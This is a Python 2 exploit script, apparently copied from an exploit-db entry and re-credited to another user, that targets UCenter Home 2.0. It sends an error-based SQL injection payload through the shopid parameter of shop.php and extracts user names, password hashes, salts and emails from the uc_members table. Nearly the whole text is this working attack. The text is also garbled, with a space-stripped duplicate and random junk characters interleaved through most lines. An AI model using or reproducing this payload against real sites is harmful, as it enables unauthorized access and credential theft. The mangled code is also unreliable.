#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl& m& F9 A+ R) f' f# C6 @3 W
0 q/ v8 x% U8 @5 r5 j
. {9 Z% [: h' A: z) D
#!/usr/bin/env python
) \4 O+ l6 V M/ z; T - Q' T' b+ O8 B
import sys
' Q% _' ~! L- ]8 eimport urllib2
. ?( h- ~$ {" O3 r+ Aimport re
; @9 N( Y2 B( J" S( u; Y 4 v/ s2 a5 `5 K; h+ Q' X' t: D) W
def info():
0 Z/ E/ N; Q! E print 'From:http://www.exploit-db.com/exploits/14997/' G2 Q: j* e! v
print 'http://www.hake.cc/Web_loudong/' 8 z) n$ G1 N. R7 r1 s
print 'changed:qiaoy'
/ a& x- Q2 I' b, M, h T print 'exp:'
# S: @2 B. v9 P$ q E print ' ./UCenter_Home_2.0.py site'
9 P$ R9 D8 b4 N0 F" T# P6 w
" Z4 J. p9 j$ D. T( D" |0 Wdef main():
4 n/ n$ j4 B% h8 u7 P! ~ if len(sys.argv) != 2:
9 o. L8 S" R, s. Q- E info() ; Y+ t: V: h, S5 q. j9 G
else:
' z/ a; p4 t3 D* ~$ } site = sys.argv[1] 6 `7 H' F! C& O, H6 b$ q* k
if site[0:7] == 'http://': k. p' I- K; y* A: W
sitesite =site & C, z7 q) F' Q: B+ G; N7 p
elif site[0:8] == 'https://': 8 w% }/ R7 Y* A* O& d8 u
sitesite = site
! v: v' \: A, Z+ D4 u# J$ Y else:
" v# \2 d& C( l' X o4 [- V- c site = 'http://'+site ) V4 a2 r' U4 `3 a' u7 y
try:
& `) S' S1 n9 \6 x url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1' 9 k' K, h: @+ f( e' b, n# h
Value = urllib2.urlopen(url).read()
6 K& ^0 X8 ?# T+ m% j5 p) T3 C# R5 j' O Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]
4 }: M3 o( E& D- ~7 V hacked = Msg.split(':')
- ^" E" `; H: L" { print 'Name: '+hacked[1] ! H$ o! Y; c, H5 q7 y/ ]( P% X I* K
print 'Passwd: '+hacked[2]
; k# S6 |) S/ A; s! V print 'salt: '+hacked[3] 6 I* ^, f) p* }1 a) X
print 'email: '+hacked[4] ' w/ j4 h: h5 m a L5 u
except: ' g" K2 `/ o( E2 R
print 'Sorry,I can\'t work............' % V1 y: ?7 I$ K4 T j% y% _
* @9 q, `. T. S% ?% A+ ^/ Fif __name__ == '__main__': " d( \+ F; s1 z5 }% v, s$ X$ z. |
main() |